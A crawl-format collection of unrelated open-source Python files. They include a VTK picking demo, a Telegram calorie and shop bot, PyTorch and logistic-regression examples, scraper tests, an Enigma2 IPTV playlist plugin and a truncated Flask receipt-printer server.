pyplot.xlabel('M/Z')
pyplot.grid(True)
pyplot.show()
| scale-lab/AcidBaseNetworks | simulations/chemcpupy/automation/Bruker/test_convert_spectra.py | test_convert_spectra.py | py | 1,382 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "Bruker.get_measurement_settings",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "Bruker.convert_settings",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "Bruker.convert_data_spectra",
"line_number": 21,
"usage_type": "call"
},
{
... |
71578947943 | # !/usr/bin/env python
import vtk
def get_program_parameters():
import argparse
description = 'Highlighting a selected object with a silhouette.'
epilogue = '''
Click on the object to highlight it.
The selected object is highlighted with a silhouette.
'''
parser = argparse.ArgumentParser(description=description, epilog=epilogue,
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('numberOfSpheres', nargs='?', type=int, default=10,
help='The number of spheres, default is 10.')
args = parser.parse_args()
return args.numberOfSpheres
class MouseInteractorHighLightActor(vtk.vtkInteractorStyleTrackballCamera):
def __init__(self, silhouette=None, silhouetteActor=None):
self.AddObserver("LeftButtonPressEvent", self.onLeftButtonDown)
self.LastPickedActor = None
self.Silhouette = silhouette
self.SilhouetteActor = silhouetteActor
def onLeftButtonDown(self, obj, event):
clickPos = self.GetInteractor().GetEventPosition()
# Pick from this location.
picker = vtk.vtkPropPicker()
picker.Pick(clickPos[0], clickPos[1], 0, self.GetDefaultRenderer())
self.LastPickedActor = picker.GetActor()
# If we picked something before, remove the silhouette actor and
# generate a new one.
if self.LastPickedActor:
self.GetDefaultRenderer().RemoveActor(self.SilhouetteActor)
# Highlight the picked actor by generating a silhouette
self.Silhouette.SetInputData(self.LastPickedActor.GetMapper().GetInput())
self.GetDefaultRenderer().AddActor(self.SilhouetteActor)
# Forward events
self.OnLeftButtonDown()
return
def SetSilhouette(self, silhouette):
self.Silhouette = silhouette
def SetSilhouetteActor(self, silhouetteActor):
self.SilhouetteActor = silhouetteActor
def main():
numberOfSpheres = get_program_parameters()
colors = vtk.vtkNamedColors()
# A renderer and render window
renderer = vtk.vtkRenderer()
renderer.SetBackground(colors.GetColor3d('SteelBlue'))
renderWindow = vtk.vtkRenderWindow()
renderWindow.SetSize(640, 480)
renderWindow.AddRenderer(renderer)
# An interactor
interactor = vtk.vtkRenderWindowInteractor()
interactor.SetRenderWindow(renderWindow)
# Add spheres to play with
for i in range(numberOfSpheres):
source = vtk.vtkSphereSource()
# random position and radius
x = vtk.vtkMath.Random(-5, 5)
y = vtk.vtkMath.Random(-5, 5)
z = vtk.vtkMath.Random(-5, 5)
radius = vtk.vtkMath.Random(.5, 1.0)
source.SetRadius(radius)
source.SetCenter(x, y, z)
source.SetPhiResolution(11)
source.SetThetaResolution(21)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
r = vtk.vtkMath.Random(.4, 1.0)
g = vtk.vtkMath.Random(.4, 1.0)
b = vtk.vtkMath.Random(.4, 1.0)
actor.GetProperty().SetDiffuseColor(r, g, b)
actor.GetProperty().SetDiffuse(.8)
actor.GetProperty().SetSpecular(.5)
actor.GetProperty().SetSpecularColor(colors.GetColor3d('White'))
actor.GetProperty().SetSpecularPower(30.0)
renderer.AddActor(actor)
# Render and interact
renderWindow.Render()
# Create the silhouette pipeline, the input data will be set in the
# interactor
silhouette = vtk.vtkPolyDataSilhouette()
silhouette.SetCamera(renderer.GetActiveCamera())
# Create mapper and actor for silhouette
silhouetteMapper = vtk.vtkPolyDataMapper()
silhouetteMapper.SetInputConnection(silhouette.GetOutputPort())
silhouetteActor = vtk.vtkActor()
silhouetteActor.SetMapper(silhouetteMapper)
silhouetteActor.GetProperty().SetColor(colors.GetColor3d("Tomato"))
silhouetteActor.GetProperty().SetLineWidth(5)
# Set the custom type to use for interaction.
style = MouseInteractorHighLightActor(silhouette, silhouetteActor)
style.SetDefaultRenderer(renderer)
# Start
interactor.Initialize()
interactor.SetInteractorStyle(style)
renderWindow.SetWindowName('HighlightWithSilhouette')
renderWindow.Render()
interactor.Start()
if __name__ == "__main__":
main()
| lorensen/VTKExamples | src/Python/Picking/HighlightWithSilhouette.py | HighlightWithSilhouette.py | py | 4,453 | python | en | code | 319 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "argparse.RawTextHelpFormatter",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "vtk.vtkInteractorStyleTrackballCamera",
"line_number": 21,
"usage_type": "attr... |
8604753979 | import telebot
from telebot import types
import config
import values
import sqlite3
# Registration BOT using TOKEN
bot = telebot.TeleBot(config.TOKEN)
# Registration DB
db = sqlite3.connect('DB/catalog.db', check_same_thread=False)
sql = db.cursor()
# For reading USER's HEIGHT
def height(message, word):
weight = message.text
msg = bot.send_message(message.chat.id, 'Введи свой рост (в сантиметрах):\n')
bot.register_next_step_handler(msg, calc, (weight, word))
# For reading AGE or printing INDEX of body mass
def calc(message, lis):
h = int(message.text) / 100
w = int(lis[0])
if lis[1] == 'Калории':
msg = bot.send_message(message.chat.id, f'Введи свой возраст:\n')
bot.register_next_step_handler(msg, age, (h * 100, w))
elif lis[1] == 'Индекс':
bot.send_photo(message.chat.id, photo=open('vals.png', 'rb'),
caption=f'Ваш индекс массы тела:\n{round(w / (h ** 2), 2)}',
parse_mode='html')
# For printing necessary number of calories and reading about type of activity
def age(message, data):
w = data[1] * 9.99
h = data[0] * 6.25
a = int(message.text) * 4.92
pre_result = round(w + h - a)
bot.send_message(message.chat.id, f'<em><b>{pre_result}</b></em> — '
f'Столько калорий необходимо вам для того, '
f'чтобы просто существовать.',
parse_mode='html')
msg = bot.send_message(message.chat.id, values.description, parse_mode='html')
bot.register_next_step_handler(msg, activity, pre_result)
# printing necessary number of calories
def activity(message, res):
result = round(res * values.values[message.text])
bot.send_message(message.chat.id, f'Для похудения необходимо <b>{result - 400} -- {result - 200}</b> калорий\n'
f'Необходимо потреблять <b>{result}</b>'
f' калорий в день чтобы нормально восстанавливаться\n'
f'Для набора массы необходимо <b>{result + 200} -- {result + 400}</b> калорий\n',
parse_mode='html')
# Read data from DB (item shop) using user_id
def read_from_items_db(user_id):
data = [el for el in sql.execute(f"SELECT * FROM items WHERE rowid = {values.user_list[str(user_id)][0]}")]
# print(data)
return data
# Creating keyboard for card (below)
def create_markup_for_card():
keyboard = types.InlineKeyboardMarkup()
key_1 = types.InlineKeyboardButton(text='⬅ Предыдущий товар', callback_data='previous')
key_2 = types.InlineKeyboardButton(text='Следующий товар ➡', callback_data='next')
key_3 = types.InlineKeyboardButton(text='🗑 Добавить в корзину', callback_data='add_in_basket')
keyboard.row(key_1, key_2)
keyboard.add(key_3)
return keyboard
# Send message with data about item (card of item)
def send_item(message):
data = read_from_items_db(message.from_user.id)[0]
markup = create_markup_for_card()
if data[4] - data[3] != 0:
cost = f'{round(data[3])} - {round(data[4])}'
else:
cost = round(data[3])
try:
msg_id = message.chat.id
except:
msg_id = message.message.chat.id
bot.send_photo(msg_id,
open(data[5], 'rb'),
caption=f'\n<b>{data[2]}</b>\n\n'
f'Цена: <b>{cost} RUB</b>\n\n'
f'<em>Описание: {data[6].capitalize()}</em>\n'
f'\nВес: {round(data[-1] * 1000)} g.',
parse_mode='html',
reply_markup=markup)
# Is User in values.user_list
def test_of_being_in_list(msg_data):
if not (str(msg_data.from_user.id) in values.user_list):
values.iter_var_changer(msg_data.from_user.id, 1, True)
# How many notes in DB
def count_of_strings():
sql.execute("SELECT rowid FROM items")
return len(sql.fetchall())
# Getting data from DB about item in USER's basket
def get_data_from_basket(message):
user_basket = values.user_list[str(message.from_user.id)][1]
message_text = '\n'
for el, count in user_basket.items():
data = sql.execute(f"SELECT name FROM items WHERE rowid = {int(el)}").fetchone()[0]
message_text += f'\n• {data} = <b>{count} шт.</b>\n'
return message_text
def create_markup_for_basket(message):
try:
msg_id = message.id
except:
msg_id = message.message.id
keyboard = types.InlineKeyboardMarkup()
key_1 = types.InlineKeyboardButton(text='❌ Очистить корзину ❌', callback_data=f'clear_basket_{msg_id}')
key_2 = types.InlineKeyboardButton(text='📋 Оформить заказ ', callback_data='create_order')
keyboard.row(key_1)
keyboard.row(key_2)
return keyboard
def response_for_check_basket(message):
try:
msg_id = message.id
chat_id = message.chat.id
except:
msg_id = message.message.id
chat_id = message.message.chat.id
text = get_data_from_basket(message)
if text == '\n':
keyboard = types.InlineKeyboardMarkup()
keyboard.add(types.InlineKeyboardButton(text='OK', callback_data=f'ok_{msg_id}'))
text = 'Корзина пуста!'
else:
keyboard = create_markup_for_basket(message)
bot.send_message(chat_id=chat_id,
text=f'{text}',
parse_mode='html',
reply_markup=keyboard)
"""
###########################################################
------ Starting of actions with different 'handlers' ------
###########################################################
"""
@bot.message_handler(commands=['calc'])
def characteristics(message):
mark = types.ReplyKeyboardMarkup(resize_keyboard=True)
mark.row(
'Индекс',
'Калории',
)
bot.send_message(message.chat.id, 'Что вы хотите узнать?', reply_markup=mark)
@bot.message_handler(commands=['hello', 'hi', 'sup'])
def greeting(message):
msg = bot.send_photo(message.chat.id, open('photos/Rock.jpg', 'rb'))
keyboard = types.InlineKeyboardMarkup()
key_1 = types.InlineKeyboardButton(text='Привет', callback_data=f'hi_{msg.id}')
key_2 = types.InlineKeyboardButton(text='Пока', callback_data=f'bye_{msg.id}')
keyboard.row(key_1, key_2)
msg = bot.send_message(message.chat.id,
f'Перед тобой бот для подсчета калорий'
f' <b>{bot.get_me().first_name}</b>',
parse_mode='html',
reply_markup=keyboard)
@bot.message_handler(commands=['market', 'shop', 'store'])
def market(message):
menu = types.ReplyKeyboardMarkup(resize_keyboard=True)
menu.row(
'Каталог',
'Корзина'
)
# menu.add('')
bot.send_message(message.chat.id, 'Добро пожаловать в магазин!\nИспользуйте меню для навигации: ',
reply_markup=menu)
test_of_being_in_list(message)
@bot.message_handler(content_types=['text'])
def handler(message):
if message.text == 'Индекс' or message.text == 'Калории':
word = message.text
msg = bot.send_message(message.chat.id, 'Введи свой вес:\n')
bot.register_next_step_handler(msg, height, word)
elif message.text == 'Каталог':
test_of_being_in_list(message)
send_item(message)
elif message.text == 'Корзина':
response_for_check_basket(message)
@bot.callback_query_handler(func=lambda call: True)
def callback(call):
test_of_being_in_list(call)
data = call.data.split('_')
if data[0] == 'hi' or data[0] == 'bye':
bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.id,
text=f'{values.for_greet[data[0]]} {call.from_user.first_name}!')
bot.delete_message(call.message.chat.id, data[1])
if call.data == 'next':
index = values.user_list[str(call.from_user.id)]
if index[0] < count_of_strings():
values.iter_var_changer(call.from_user.id, index[0] + 1)
else:
values.iter_var_changer(call.from_user.id, 1)
send_item(call)
elif call.data == 'previous':
index = values.user_list[str(call.from_user.id)]
if index[0] > 1:
values.iter_var_changer(call.from_user.id, index[0] - 1)
else:
values.iter_var_changer(call.from_user.id, count_of_strings())
send_item(call)
elif call.data == 'add_in_basket':
index = values.user_list[str(call.from_user.id)]
try:
count = values.user_list[str(call.from_user.id)][1][str(index[0])]
values.add_item(call.from_user.id, index[0], count + 1)
except Exception as ex:
# print(f'Firstly!{"#" * 10}Exception: {ex}')
values.add_item(call.from_user.id, index[0], 1)
bot.answer_callback_query(callback_query_id=call.id, text='\nТовар добавлен в корзину!\n')
# for user, data in values.user_list.items():
# print(f' |||{user} --- {data}|||')
elif data[0] == 'ok':
# bot.edit_message_text(chat_id=call.message.chat.id, text='Продолжайте покупки!', message_id=call.message.id)
try:
bot.delete_message(chat_id=call.message.chat.id, message_id=call.message.id)
bot.delete_message(chat_id=call.message.chat.id, message_id=data[1])
except Exception as ex:
print(ex)
elif data[0] + '_' + data[1] == 'clear_basket':
values.clear_basket(call.from_user.id)
try:
bot.delete_message(call.message.chat.id, data[2])
bot.delete_message(call.message.chat.id, call.message.id)
except Exception as ex:
print(ex)
bot.answer_callback_query(call.id)
bot.polling(none_stop=True)
| Abrahamlink/body-bot | bot.py | bot.py | py | 10,450 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "telebot.TeleBot",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "config.TOKEN",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sqlite3.connect",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "values.description",
... |
37775727462 | # https://leetcode-cn.com/problems/reverse-string/
# 编写一个函数,其作用是将输入的字符串反转过来。输入字符串以字符数组 char[] 的形式给出。
#
# 不要给另外的数组分配额外的空间,你必须原地修改输入数组、使用 O(1) 的额外空间解决这一问题。
#
# 你可以假设数组中的所有字符都是 ASCII 码表中的可打印字符。
#
# 示例 1:
#
# 输入:["h","e","l","l","o"]
# 输出:["o","l","l","e","h"]
# 示例 2:
#
# 输入:["H","a","n","n","a","h"]
# 输出:["h","a","n","n","a","H"]
from typing import List
class Solution:
# 直接交换,交换次数为数组长度除以2的整数商
def reverseString(self, s: List[str]) -> None:
"""
Do not return anything, modify s in-place instead.
"""
if not s:
return
times = len(s) // 2
for i in range(times):
s[i], s[-(i + 1)] = s[-(i + 1)], s[i]
# 简化方案
def reverseString2(self, s: List[str]) -> None:
s[:] = s[::-1]
# 双指针
def reverseString3(self, s: List[str]) -> None:
"""
Do not return anything, modify s in-place instead.
"""
l, r = 0, len(s) - 1
while l < r:
s[l], s[r] = s[r], s[l]
l += 1
r -= 1
# python 有个 reverse 函数,可以直接翻转列表
| cookie-rabbit/LeetCode_practice | 专题/入门/字符串/344 反转字符串/1.py | 1.py | py | 1,403 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 33,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 37,
"usage_type": "name"
}
] |
31833081682 | import pytest
from bs4 import BeautifulSoup
import nerdtracker_client.constants.stats as ntc_stats
from nerdtracker_client.scraper import (
create_scraper,
parse_tracker_html,
retrieve_page_from_tracker,
retrieve_stats,
retrieve_stats_multiple,
)
class TestScraper:
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_page_from_tracker(
self, valid_activision_user_string
) -> None:
scraper = create_scraper()
soup = retrieve_page_from_tracker(
scraper, valid_activision_user_string, cold_war_flag=True
)
# Check that the soup object does not contain a failed request message
failed_string = "Enable JavaScript and cookies to continue"
assert failed_string not in soup.text
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_invalid_page_from_tracker(
self, invalid_activision_user_string
) -> None:
scraper = create_scraper()
soup = retrieve_page_from_tracker(
scraper, invalid_activision_user_string, cold_war_flag=True
)
# Check that the soup object contains a failed stats message
failed_string = "stats not found"
assert failed_string in soup.text
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_empty_page_from_tracker(
self, empty_activision_user_string
) -> None:
scraper = create_scraper()
soup = retrieve_page_from_tracker(
scraper, empty_activision_user_string, cold_war_flag=True
)
# Check that the soup object contains a failed stats message
failed_string = "404 Page not Found"
assert failed_string in soup.text
class TestParseTrackerHtml:
def test_parse_tracker_html(
self, html_page: str, joy_stats: ntc_stats.StatColumns
) -> None:
soup = BeautifulSoup(html_page, "html.parser")
stats = parse_tracker_html(soup)
assert stats == joy_stats
class TestRetrieve:
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_stats(
self,
valid_activision_user_string: str,
joy_stats: ntc_stats.StatColumns,
) -> None:
stats = retrieve_stats(valid_activision_user_string, cold_war_flag=True)
if stats == {}:
pytest.skip("Cloudflare challenge detected, skipping test")
assert stats == joy_stats
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_stats_multiple(
self,
activision_user_string_list: list[str],
stat_list: list[ntc_stats.StatColumns | dict | None],
) -> None:
stats = retrieve_stats_multiple(
activision_user_string_list, cold_war_flag=True
)
assert stats == stat_list
| cesaregarza/Nerdtracker_Client | nerdtracker_client/tests/test_scraper.py | test_scraper.py | py | 2,972 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nerdtracker_client.scraper.create_scraper",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "nerdtracker_client.scraper.retrieve_page_from_tracker",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "pytest.mark",
"line_number": 15,
"usage_t... |
36532411991 | #The code base on https://github.com/zergtant/pytorch-handbook
import torch # pytorch 实现
import torch.nn as nn
import numpy as np #处理矩阵运算
'''
1 logistic回归会在线性回归后再加一层logistic函数的调用,主要
用于二分类预测
2 使用UCI German Credit 数据集
german.data-numeric 是已经使用numpy 处理好的数值化数据,
可以直接numpy 调用
'''
# 第一步:读取数据
data=np.loadtxt("german.data-numeric") #将数据放到文件中加载
#第二步:对数据做归一化处理
n,l=data.shape #shape 返回矩阵大小
for i in range(l-1): #按列索引
meanVal=np.mean(data[:,i]) #求均值 [:,i] 取所有行第i列所有值
stdVal=np.std(data[:i]) # 标准差
data[:,i]=(data[:,i]-meanVal)/stdVal
#打乱数据
np.random.shuffle(data)
'''
第三步:区分数据集和测试集:
区分规则:900条用于训练,100条用于测试
前24列为24个维度,最后一个要打的标签(0,1)
'''
train_data=data[:900,:l-1]
train_lab=data[:900,l-1]-1
test_data=data[900:,:l-1]
test_lab=data[900:,l-1]-1
#第四步 定义模型
class Logistic_Regression(nn.Module):
#初始化模型
def __init__(self):
# super(Logistic_Regression,self) 首先找到 Logistic_Regression的父类(就是类nn.Module)
# 然后把类 Logistic_Regression的对象转换为类 nn.Module的对象
super(Logistic_Regression,self).__init__()
self.fc=nn.Linear(24,2) # 输入通道为24,输出通道为2
#前向传播
def forward(self,x):
out=self.fc(x)
out=torch.sigmoid(out) # sigmoid 激活
return out
#测试集上的准确率
def test(pred,lab):
t=pred.max(-1)[1]==lab
return torch.mean(t.float())
#第五步:设置超参数和优化
net=Logistic_Regression()
criterion=nn.CrossEntropyLoss() #定义损失函数
optm=torch.optim.Adam(net.parameters()) #利用Adam 进行优化
epochs=1100#训练次数
#第六步:开始训练
for i in range(epochs):
#指定模型为训练模式,计算梯度
net.train()
#将numpy 输入转换为torch的Tensor
x=torch.from_numpy(train_data).float()
y=torch.from_numpy(train_lab).long()
y_hat=net(x) #x 为训练数据
loss=criterion(y_hat,y) #计算损失
optm.zero_grad() #前一步损失清零
loss.backward() #f=反向传播
optm.step() #优化
if (i+1)%100==0: #每一百100输出相关信息
net.eval()
test_in=torch.from_numpy(test_data).float()
test_l=torch.from_numpy(test_lab).long()
test_out=net(test_in)
accu=test(test_out,test_l)
print("Epoch:{},Loss:{:.4f},Accuracy:{:.2f}".format(i+1,loss.item(),accu))
| BrandonHoo/Deep-Learning-Practice-Project | Logistic_Regression_practice.py | Logistic_Regression_practice.py | py | 2,774 | python | zh | code | 1 | github-code | 36 | [
{
"api_name": "numpy.loadtxt",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "numpy.std",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "numpy.random.shuffle",
"line_n... |
14007726581 | import torch
import torch.nn as nn
import os
from torchvision import datasets, transforms
from torch.utils.data import DataLoader, Dataset
import wandb
from PIL import Image
import numpy as np
from tqdm import tqdm
from torch.optim.lr_scheduler import ExponentialLR
class Encoder(nn.Module):
def __init__(self, encoded_space_dim):
super().__init__()
### Convolutional section
self.encoder_cnn = nn.Sequential(
nn.Conv2d(in_channels = 3, out_channels = 8, kernel_size = 9, stride=2, padding=2),
nn.ReLU(True),
nn.Conv2d(in_channels = 8, out_channels = 16, kernel_size = 9, stride=2, padding=2),
nn.BatchNorm2d(16),
nn.ReLU(True),
nn.Conv2d(in_channels = 16, out_channels = 32, kernel_size = 9, stride=2, padding=2),
nn.BatchNorm2d(32),
nn.ReLU(True),
nn.Conv2d(in_channels = 32, out_channels = 64, kernel_size = 9, stride=2, padding=1),
nn.ReLU(True),
)
### Flatten layer
self.flatten = nn.Flatten(start_dim=1)
### Linear section
self.encoder_lin = nn.Sequential(
nn.Linear(8 * 8 * 64, encoded_space_dim),
nn.ReLU(True),
)
def forward(self, x):
x = self.encoder_cnn(x)
x = self.flatten(x)
x = self.encoder_lin(x)
return x
class Decoder(nn.Module):
def __init__(self, encoded_space_dim):
super().__init__()
self.decoder_lin = nn.Sequential(
nn.Linear(encoded_space_dim, 8 * 8 * 64),
nn.ReLU(True)
)
self.unflatten = nn.Unflatten(dim=1,
unflattened_size=(64, 8, 8))
self.decoder_conv = nn.Sequential(
nn.ConvTranspose2d(in_channels = 64, out_channels = 32, kernel_size = 9, stride=2, padding = 1, output_padding= 1,),
nn.BatchNorm2d(32),
nn.ReLU(True),
nn.ConvTranspose2d(in_channels = 32, out_channels = 16, kernel_size = 9, stride=2, padding = 2, output_padding = 1),
nn.BatchNorm2d(16),
nn.ReLU(True),
nn.ConvTranspose2d(in_channels = 16, out_channels = 8, kernel_size = 9, stride=2, padding = 3, output_padding = 1),
nn.BatchNorm2d(8),
nn.ReLU(True),
nn.ConvTranspose2d(in_channels = 8, out_channels = 3, kernel_size = 9, stride=2, padding = 2, output_padding = 1),
)
self.post_net =nn.Sequential(
nn.Conv2d(in_channels=3, out_channels=16, kernel_size=5, padding=2),
nn.BatchNorm2d(16),
nn.ReLU(True),
nn.Conv2d(in_channels=16, out_channels=8, kernel_size=5, padding=2),
nn.BatchNorm2d(8),
nn.ReLU(True),
nn.Conv2d(in_channels=8, out_channels=3, kernel_size=5, padding=2),
)
def forward(self, x):
x = self.decoder_lin(x)
x = self.unflatten(x)
x = self.decoder_conv(x)
x = torch.sigmoid(x)
y = self.post_net(x)
y = torch.sigmoid(x + y)
return x, y
def train(encoder, decoder, train_loader, device = 'cpu', logger = None):
optimizer = torch.optim.Adam(list(encoder.parameters()) + list(decoder.parameters()), lr=0.0001, weight_decay=1e-05)
scheduler = ExponentialLR(optimizer, gamma=0.9)
loss_func = nn.MSELoss()
encoder.to(device).train()
decoder.to(device).train()
for epoch in range(100):
for step, x in enumerate(train_loader):
x = torch.tensor(x.clone() , dtype = torch.float32, device = device) / 255.0
pre_out, post_out = decoder(encoder(x))
loss = 0.8 * loss_func(pre_out, x) + loss_func(post_out, x)
optimizer.zero_grad()
loss.backward()
optimizer.step()
logger.log({'Loss': loss.cpu().item()})
input = wandb.Image(x[0].cpu().detach().numpy().reshape(200,200,3))
output = wandb.Image(post_out[0].cpu().detach().numpy().reshape(200,200,3))
logger.log({"Input": input,
"Output": output})
scheduler.step()
class UTKFaceDataset(Dataset):
def __init__(self, test_size = .2, data_type = "train"):
"""
Create data loader for UTKFace dataset
"""
self.data_dir = 'data/UTKFace/'
self.all_files = os.listdir(self.data_dir)
if data_type == "train":
self.data = []
for file in tqdm(self.all_files[:]):
img = Image.open(self.data_dir + file)
self.data.append(np.asanyarray(img).reshape(3,200,200))
img.close()
self.X = torch.tensor(np.stack(self.data))
def get_data(self):
return self.X.shape, self.y.shape
def __len__(self):
return self.X.shape[0]
def __getitem__(self, idx):
img = self.X[idx]
return img
if __name__ == '__main__':
dim = 256
# torch.manual_seed(1000)
dataset = UTKFaceDataset()
# train_loader = DataLoader(datasets, batch_size=32, shuffle=True)
# logger = wandb.init(project="autoencoder", name=f"AE {dim} TEST", entity='petergroenning')
encoder_weights = torch.load('models/encoder_256.pt', map_location=torch.device('cpu'))
decoder_weights = torch.load('models/decoder_256.pt', map_location=torch.device('cpu'))
encoder = Encoder(encoded_space_dim=dim)
decoder = Decoder(encoded_space_dim=dim)
encoder.load_state_dict(encoder_weights)
decoder.load_state_dict(decoder_weights)
encoder.eval()
decoder.eval()
print(dataset.X.shape)
# decoder = Decoder(encoded_space_dim=dim, fc2_input_dim=512)
# torch.manual_seed(1000)
# train(encoder, decoder, train_loader, device = 'cuda', logger = logger)
# torch.save(encoder.state_dict(), f"encoder_{dim}.pth")
# torch.save(decoder.state_dict(), f"decoder{dim}.pth")
| s183920/02582_Computational_Data_Analysis_Case2 | autoencoder.py | autoencoder.py | py | 6,011 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"lin... |
25127011115 | #!/usr/bin/python
# -*- coding: utf-8 -*-
'''
****************************************
* coded by Lululla & PCD *
* skin by MMark *
* 26/03/2023 *
* Skin by MMark *
****************************************
# --------------------#
# Info http://t.me/tivustream
'''
from __future__ import print_function
from Components.ActionMap import ActionMap
from Components.Label import Label
from Components.Pixmap import Pixmap
from Screens.Screen import Screen
from Tools.Directories import SCOPE_PLUGINS
from Tools.Directories import resolveFilename
from enigma import eTimer
import codecs
import os
import re
import six
import ssl
import sys
from Plugins.Extensions.xxxplugin.plugin import rvList, Playstream1
from Plugins.Extensions.xxxplugin.plugin import show_
from Plugins.Extensions.xxxplugin.lib import Utils
from Plugins.Extensions.xxxplugin import _, skin_path
PY3 = sys.version_info.major >= 3
print('Py3: ', PY3)
if sys.version_info >= (2, 7, 9):
try:
sslContext = ssl._create_unverified_context()
except:
sslContext = None
currversion = '1.0'
title_plug = 'freearhey '
desc_plugin = ('..:: freearhey by Lululla %s ::.. ' % currversion)
PLUGIN_PATH = resolveFilename(SCOPE_PLUGINS, "Extensions/{}".format('xxxplugin'))
current = os.path.dirname(os.path.realpath(__file__))
parent = os.path.dirname(current)
sys.path.append(parent)
print(current)
print(parent)
pluglogo = os.path.join(PLUGIN_PATH, 'pic/freearhey.png')
stripurl = 'aHR0cHM6Ly9pcHR2LW9yZy5naXRodWIuaW8vaXB0di9jYXRlZ29yaWVzL3h4eC5tM3U='
referer = 'https://github.com/iptv-org/iptv'
_session = None
Path_Movies = '/tmp/'
PY3 = sys.version_info.major >= 3
class main(Screen):
def __init__(self, session):
self.session = session
Screen.__init__(self, session)
skin = os.path.join(skin_path, 'defaultListScreen.xml')
with codecs.open(skin, "r", encoding="utf-8") as f:
self.skin = f.read()
self.menulist = []
self['menulist'] = rvList([])
self['red'] = Label(_('Back'))
# self['green'] = Label(_('Export'))
self['title'] = Label('')
self['title'].setText(title_plug)
self['name'] = Label('')
self['text'] = Label('Only for Adult by Lululla')
self['poster'] = Pixmap()
self.currentList = 'menulist'
self['actions'] = ActionMap(['OkCancelActions',
'ColorActions',
'DirectionActions',
'MovieSelectionActions'], {'up': self.up,
'down': self.down,
'left': self.left,
'right': self.right,
'ok': self.ok,
'green': self.ok,
'cancel': self.exit,
'red': self.exit}, -1)
self.timer = eTimer()
if Utils.DreamOS():
self.timer_conn = self.timer.timeout.connect(self.updateMenuList)
else:
self.timer.callback.append(self.updateMenuList)
self.timer.start(500, True)
def up(self):
self[self.currentList].up()
auswahl = self['menulist'].getCurrent()[0][0]
self['name'].setText(str(auswahl))
def down(self):
self[self.currentList].down()
auswahl = self['menulist'].getCurrent()[0][0]
self['name'].setText(str(auswahl))
def left(self):
self[self.currentList].pageUp()
auswahl = self['menulist'].getCurrent()[0][0]
self['name'].setText(str(auswahl))
def right(self):
self[self.currentList].pageDown()
auswahl = self['menulist'].getCurrent()[0][0]
self['name'].setText(str(auswahl))
def updateMenuList(self):
self.cat_list = []
for x in self.cat_list:
del self.cat_list[0]
items = []
try:
url = Utils.b64decoder(stripurl)
content = Utils.getUrl2(url, referer)
if six.PY3:
content = six.ensure_str(content)
regexcat = '#EXTINF.*?title="(.+?)".*?,(.+?)\\n(.+?)\\n'
match = re.compile(regexcat, re.DOTALL).findall(content)
for country, name, url in match:
if ".m3u8" not in url:
continue
url = url.replace(" ", "").replace("\\n", "").replace('\r', '')
name = name.replace('\r', '')
name = country + ' | ' + name
item = name + "###" + url + '\n'
items.append(item)
items.sort()
for item in items:
name = item.split('###')[0]
url = item.split('###')[1]
name = name.capitalize()
self.cat_list.append(show_(name, url))
self['menulist'].l.setList(self.cat_list)
auswahl = self['menulist'].getCurrent()[0][0]
self['name'].setText(str(auswahl))
except Exception as e:
print('exception error ', str(e))
def ok(self):
name = self['menulist'].getCurrent()[0][0]
url = self['menulist'].getCurrent()[0][1]
self.play_that_shit(url, name)
def play_that_shit(self, url, name):
self.session.open(Playstream1, str(name), str(url))
def exit(self):
self.close()
| Belfagor2005/xxxplugin | usr/lib/enigma2/python/Plugins/Extensions/xxxplugin/Sites/freearhey.py | freearhey.py | py | 5,713 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.version_info",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "sys.version_info",
"line_number": 35,
"usage_type": "attribute"
},
{
"api_name": "ssl._create_unverified_context",
"line_number": 37,
"usage_type": "call"
},
{
"api_na... |
40290054155 | from flask import Flask, request, jsonify
from flask_cors import CORS
import re
from escpos.printer import Network
import base64
import os
app = Flask(__name__)
CORS(app)
@app.route('/text/<addr>', methods=['GET','POST'])
def print_text(addr):
data, printer, message = setup_for_command(request, addr)
if message:
return message
printer.text(data)
cut(printer=printer)
return jsonify(message="Success!", code=200)
@app.route('/block/<addr>', methods=['GET','POST'])
def print_block(addr):
data, printer, message = setup_for_command(request, addr)
if message:
return message
printer.block_text(data)
cut(printer=printer)
return jsonify(message="Success!", code=200)
@app.route('/img/<addr>', methods=['GET','POST'])
def print_img(addr):
data, printer, message = setup_for_command(request, addr, data_type="img")
if message:
return message
printer.image(data)
cut(printer=printer)
return jsonify(message="Success!", code=200)
@app.route('/status/<addr>', methods=['GET'])
def print_status(addr):
try:
cut(addr=addr, request=request)
